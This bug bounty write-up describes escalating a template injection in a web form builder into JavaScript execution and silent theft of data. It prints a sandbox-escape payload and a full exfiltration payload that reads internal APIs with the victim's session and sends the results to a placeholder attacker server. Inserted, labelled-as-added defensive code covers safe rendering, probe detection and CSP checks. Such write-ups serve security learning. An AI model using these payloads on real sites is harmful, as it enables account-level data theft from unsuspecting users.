SSTI Leads to $$$$: Turning a Medium Bug into High Impact Data Exfiltration

Hi, I'm Kartik — a bug bounty hunter who enjoys turning simple findings into real-world impact.

🔗 Blog/Portfolio: https://kartikhunter.github.io/
🔗 GitHub: https://github.com/Kartikhunter

This is the story of how a simple SSTI turned into a high-impact data exfiltration vulnerability… and $$$$.

A Quick Note on SSTI

Before jumping into the story, let's quickly understand what Server-Side Template Injection (SSTI) is.

Modern web applications use template engines to render dynamic content. If user input is directly injected into these templates without proper sanitization, it can lead to SSTI.

A simple test usually looks like this:

{{7*7}}

If the output comes back as 49, you're not just dealing with reflection — the server is actually evaluating your input.

Different template engines behave differently:

  • Jinja2 (Python): {{7*7}}
  • Twig (PHP): {{7*7}}
  • Freemarker (Java): ${7*7}
  • Velocity (Java): #set($x=7*7) $x
  • Handlebars (Node.js): {{this}}

For more, read: SSTI (Server Side Template Injection) — HackTricks

In the best case for an attacker, SSTI leads to Remote Code Execution (RCE). But sometimes… things don't go that smoothly.
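To make the {{7*7}} test concrete from the defender's side, here is an added example (not code from the original post or from the application it describes): a minimal {{ ... }} renderer in its vulnerable form, the hardened form that treats user text as data instead of template, and a small detector for the probe strings listed above. Function names, the regexes and the sample inputs are assumptions made for this illustration.

```javascript
// Added example, not from the original post. Names are assumptions.

// VULNERABLE: every {{ ... }} inside the user-controlled string is evaluated as code.
// This is exactly the behaviour the {{7*7}} -> 49 probe reveals.
function renderUnsafe(template, context = {}) {
  return template.replace(/\{\{([\s\S]*?)\}\}/g, (_, expr) => {
    // new Function hands the expression the full JS runtime
    const fn = new Function(...Object.keys(context), `return (${expr});`);
    return String(fn(...Object.values(context)));
  });
}

// HARDENED: the layout is developer-authored and fixed; user-supplied text is only
// ever looked up from the context by a plain identifier and HTML-escaped on output,
// so a value of "{{7*7}}" stays the literal text "{{7*7}}".
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}
function renderSafe(layout, context) {
  return layout.replace(/\{\{\s*([A-Za-z_][A-Za-z0-9_]*)\s*\}\}/g, (_, key) =>
    Object.prototype.hasOwnProperty.call(context, key) ? escapeHtml(context[key]) : ''
  );
}

// DETECTION: flag stored field values that look like template-expression probes for
// the engine families listed above (Jinja2/Twig/Handlebars, Freemarker, Velocity).
const PROBE_PATTERNS = [
  /\{\{[^}]*\}\}/, // {{ ... }}
  /\$\{[^}]*\}/,   // ${ ... }
  /#set\s*\(/i,    // #set( ... )
  /\{%[^%]*%\}/,   // {% ... %} block tags
];
function looksLikeTemplateProbe(value) {
  return PROBE_PATTERNS.some((re) => re.test(String(value)));
}

// Constructed sample: a form "header" field as an attacker and a normal user would fill it.
const PROBE_HEADER = 'Header: {{7*7}}';
const NORMAL_HEADER = 'Welcome to the survey!';
```

The point of renderSafe is not the escaping alone: the user-controlled value never reaches the template engine as template source, only as data. looksLikeTemplateProbe is a logging aid for the form-builder's save path, so that {{7*7}}-style probes in stored fields show up in review before anyone renders them.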

🕵️ The "Hmm… Something's Off Here" Moment

While casually poking around the application, I stumbled upon a feature where users could create custom forms. Nothing fancy. Just another form builder… or so I thought. But then I noticed something — a header field that felt a little too dynamic. You know that feeling during testing when something just doesn't sit right? Yeah… this was one of those moments.

🧪 Curiosity > Everything

Out of pure curiosity (and a bit of habit), I dropped a harmless payload:

{{3*3}}

And the response? 👉 9

At that exact moment, things went from:

[Meme: When {{3*3}} actually returns 9 😏]

Because that wasn't a reflection. That was execution.

🚧 Reality Check: "It Won't Be That Easy"

Now obviously, the next step was to go full offensive mode. Tried all the usual suspects:

  • RCE payloads
  • Object traversal
  • Anything remotely dangerous

💡 The "Let's Try a Different Angle" Move

When direct paths don't work, you don't stop — you pivot.

Instead of forcing RCE, I thought:

"Let's see if I can execute anything at all…"

After trying multiple payload variations, I landed on this:

{{[].filter.constructor('alert(1)')()}}

And then… 💥 Alert popped.

😏 That One Smile Moment

That tiny alert box might not look like much. But if you've done bug bounty long enough, you know:

"That tiny little alert is what makes the big money."

🤔 "Just an Alert? Or Something More…"

At this point, I had JavaScript execution. Cool… but also not that impressive on its own.

  • No RCE
  • No direct server control

[Meme: "Let's squeeze a bit more out of this…" 🧠]

So technically, this could easily be labeled as:

"Nice find… Medium severity."

But honestly, that didn't feel right. Because the real question was:

"If JS is running… then what all can I do?"

🚀 Time to Get Serious

Now the goal was clear: 👉 Can I access sensitive data using this execution? 👉 Can I make the victim's browser do the work for me?

After some trial and error, I crafted this payload:

{{[].filter.constructor("
  fetch('https://target.com/api/actblueentitywebhookrequests/', {
    credentials: 'include'
  })
  .then(r => r.text())
  .then(data => {
    fetch('https://<attacker-server>/?leak=' + btoa(data));
  })
")()}}

⚡ "Silent Data Heist" Mode Activated

What this payload does is actually pretty sneaky:

  • It calls internal API endpoints
  • Uses the victim's logged-in session automatically
  • Reads the response
  • Encodes it (Base64, just to keep things clean)
  • Sends it straight to my server

All of this…

👉 Without any user interaction 👉 Without any visible change 👉 Without raising suspicion

Just open the form… and data is gone.
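The payload above depends on two browser requests: a same-origin API call that rides on the victim's cookies, and a cross-origin call that carries the result out. Here is an added example (not code from the original post) of the containment check a defender would want for the second hop: a simplified evaluator for the Content-Security-Policy connect-src directive, run against constructed policies for a page on target.com. All function names and the sample policies are assumptions, and the matcher covers only 'self', 'none', '*', plain host sources and "*." wildcards, not the full CSP source grammar.

```javascript
// Added example, not from the original post. Names and policies are assumptions.

// Pull the connect-src source list out of a CSP header value; null if the directive is absent.
function parseConnectSrc(cspHeader) {
  const directive = cspHeader
    .split(';')
    .map((d) => d.trim())
    .find((d) => d.startsWith('connect-src'));
  if (!directive) return null; // real browsers fall back to default-src; not modelled here
  return directive.split(/\s+/).slice(1);
}

// Does one CSP source expression permit a request from pageOrigin to target (a URL object)?
function sourceMatches(source, pageOrigin, target) {
  const page = new URL(pageOrigin);
  if (source === "'none'") return false;
  if (source === "'self'") return target.origin === page.origin;
  if (source === '*') return true;
  // host-source: optional scheme, optional "*." prefix, host, optional port
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/]+)(?::(\d+|\*))?$/i.exec(source);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (scheme && scheme.toLowerCase() !== target.protocol.replace(':', '')) return false;
  const targetHost = target.hostname.toLowerCase();
  const sourceHost = host.toLowerCase();
  const hostOk = wildcard ? targetHost.endsWith('.' + sourceHost) : targetHost === sourceHost;
  if (!hostOk) return false;
  const targetPort = target.port || (target.protocol === 'https:' ? '443' : '80');
  if (port && port !== '*' && port !== targetPort) return false;
  return true;
}

// Would a fetch() from a page at pageOrigin to url be allowed under cspHeader?
function connectAllowed(cspHeader, pageOrigin, url) {
  const sources = parseConnectSrc(cspHeader);
  if (sources === null) return true; // no directive: treated as permissive in this demo
  const target = new URL(url);
  return sources.some((s) => sourceMatches(s, pageOrigin, target));
}

// Constructed sample: the vulnerable form lives on target.com. STRICT_CSP is the policy
// a defender would deploy; LOOSE_CSP is the kind of policy that leaves the exfil hop open.
const PAGE_ORIGIN = 'https://target.com';
const STRICT_CSP = "default-src 'self'; connect-src 'self' https://api.target.com";
const LOOSE_CSP = "default-src 'self'; connect-src *";
const INTERNAL_API = 'https://target.com/api/profile';
const EXFIL_URL = 'https://attacker.example/?leak=ZGF0YQ=='; // constructed placeholder for <attacker-server>
```

Under STRICT_CSP the internal API call is still allowed (it is same-origin, which is what makes the credentials: 'include' step work), but the browser refuses the request to the attacker host, so the stolen response never leaves the page. connect-src only governs fetch, XHR and WebSocket, so a full policy needs the other fetch directives locked down too, and none of this fixes the injection itself: the field content must stop being treated as template source.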

🎯 And Then Things Got Real

Now came the interesting part.

Whenever someone (especially an admin or other users 👀) visited that form:

  • Their session got used
  • API requests were made silently
  • Sensitive data started flowing to my server

I tested this on endpoints like:

  • /api/profile
  • /api/customer/federacy-one/

And yep… it worked exactly as expected.


From "Meh" to "Okay This Is Serious"

Initially, the bug looked like: 👉 SSTI (no RCE) → Medium

But after demonstrating:

  • Real data access
  • Session-based exploitation
  • Silent exfiltration

👉 It was upgraded to High severity

💰 And Yes… This Is Where $$$$ Comes In

This is exactly why:

Impact > Bug Type

Same Vulnerability. Different Mindset. And suddenly…

👉 SSTI → $$$$

🧠 Final Thought

A lot of bugs don't look impressive at first.

But the real difference is:

Do you stop at what you found… or do you explore what it can become?